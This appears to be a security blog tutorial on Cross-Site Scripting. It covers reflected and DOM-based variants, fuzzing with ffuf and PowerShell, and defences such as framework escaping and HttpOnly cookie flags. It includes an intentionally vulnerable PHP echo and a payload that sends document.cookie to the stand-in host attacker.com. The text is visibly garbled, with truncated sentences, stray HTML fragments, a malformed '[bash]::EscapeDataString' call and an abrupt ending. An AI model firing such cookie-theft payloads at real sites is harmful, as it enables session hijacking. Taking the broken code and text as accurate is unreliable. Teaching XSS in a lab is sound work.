Listen to this Post
Introduction
Cross‑Site Scripting (XSS) remains one of the most prevalent web vulnerabilities, allowing attackers to inject malicious scripts into pages that users fully trust. Unlike traditional breaches that target servers directly, XSS exploits the relationship between a user, their browser, and a seemingly legitimate website – turning trusted domains into attack delivery systems. With over 60% of web applications still vulnerable to some form of XSS according to recent OWASP data, understanding both the mechanics and the countermeasures is no longer optional for developers or security professionals.
Learning Objectives
- Understand the three main types of XSS (Reflected, Stored, DOM‑based) and how each executes in the victim’s browser context.
- Learn to craft and test basic XSS payloads in a controlled lab environment using browser developer tools and interception proxies.
- Implement practical, layered defenses including output encoding, Content Security Policy (CSP) headers, and input validation rules across Linux and Windows web servers.
You Should Know
- Reflected XSS Deep Dive – How a Single Click Leaks Your Cookies
Reflected XSS is the most common variant, where the malicious script is embedded in a crafted link and immediately “reflected” back from the server in the HTTP response. The victim must click the link (often delivered via phishing email or social media) while logged into a trusted site. The server does not store the payload – it merely echoes it, making detection harder for automated scanners that only check stored inputs.
Step‑by‑step lab demonstration (Linux & Windows):
- Set up a vulnerable test environment (never on production). Use a local Apache/Nginx server with a simple PHP script:
// search.php – intentionally vulnerable echo "You searched for: " . $_GET['q'];
- Craft a malicious link containing a JavaScript payload that steals cookies:
http://localhost/search.php?q=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script> - Encode the payload for reliable delivery – browsers may block raw `` into each parameter. Use Burp Suite’s Repeater to send modified requests quickly:
- Install Burp Suite Community Edition (free, works on Linux/Windows/macOS).
- Set browser proxy to 127.0.0.1:8080, capture a request, send to Repeater.
- Add the payload to a parameter, send, and inspect the response for unencoded script tags.
3. Look for reflection in odd places – JavaScript variables, `onclick` attributes, or inside existing script blocks. Example payload for a JavaScript context:
'; alert(document.domain); //
4. Use browser developer tools to trace execution (F12 → Console tab). If your payload triggers a JavaScript error or executes, you’ve found a vulnerability.
5. For DOM‑based XSS, examine the page’s JavaScript that reads from `window.location` or `document.referrer` and writes to `document.write()` or .innerHTML. Use the DOM Invader tool (built into Burp’s embedded browser) to automatically test for sinks.
Linux command to fuzz parameters (using ffuf and a wordlist of XSS payloads):
ffuf -u "http://target.com/search.php?q=FUZZ" -w xss-payloads.txt -fs 1234
Windows PowerShell alternative using Invoke-WebRequest in a loop:
$payloads = Get-Content .\xss-payloads.txt
foreach ($p in $payloads) {
$url = "http://target.com/search.php?q=" + [bash]::EscapeDataString($p)
$resp = Invoke-WebRequest -Uri $url
if ($resp.Content -match "alert") { Write-Host "Potential XSS at $url" }
}
- Secure Framework Defaults – How React, Angular, and Vue Automatically Block XSS
Modern frontend frameworks escape dynamic content by default, but misconfigurations or direct DOM manipulation can reintroduce risks. Understanding each framework’s safe and unsafe patterns is critical.
Step‑by‑step secure usage:
- React: JSX escapes values embedded in `{}` – safe. Dangerous: `dangerouslySetInnerHTML` – never use with user input.
// Safe</li> </ul> <div>{userInput}</div> // Unsafe <div dangerouslySetInnerHTML={{__html: userInput}} />- Angular: Interpolation `{{ }}` sanitizes HTML, but `
` requires explicit bypass with <code>DomSanitizer</code>. Always use `bypassSecurityTrustHtml` only after validation. - Vue: Mustache syntax `{{ }}` escapes; use `v-html` with extreme caution – treat like <code>innerHTML</code>. - Validation on the backend is still mandatory because attackers can send raw HTTP requests bypassing frontend frameworks. <ol> <li>Advanced Mitigation – HttpOnly & Secure Flags for Session Cookies</li> </ol> Even if an attacker executes XSS, they cannot steal a cookie marked with the `HttpOnly` flag (prevents JavaScript access). Adding the `Secure` flag ensures the cookie is only sent over HTTPS. <h2 style="color: yellow;">Configuration examples:</h2> <ul> <li>Set cookie flags in application code (Node.js/Express): [bash] res.cookie('sessionId', token, { httpOnly: true, secure: true, sameSite: 'Strict' }); - Apache – using `mod_headers` to modify existing cookies:
Header edit Set-Cookie ^(.)$ $1;HttpOnly;Secure;SameSite=Strict
- IIS (Windows) – add to
web.config:<httpCookies httpOnlyCookies="true" requireSSL="true" sameSite="Strict" />
- Test with browser dev tools – under Application → Cookies, verify that the “HttpOnly” and “Secure” columns are checked.
What Undercode Say
- XSS is a trust attack, not a system breach – It weaponizes the user’s confidence in a legitimate website, making awareness training as important as technical controls.
- Defense is layered and context‑sensitive – No single fix (CSP, encoding, or HttpOnly) blocks all XSS vectors; you must combine output encoding, strict CSP, secure cookies, and framework‑safe patterns.
- Automated scanners miss many reflections – Manual testing with Burp Repeater and DOM Invader reveals edge cases like JSON‑based XSS or injection inside JavaScript template literals.
Analysis: The LinkedIn post by Ethical Hackers Academy correctly highlights Reflected XSS as the most common type but only scratches the surface. Real‑world exploitation often bypasses simple `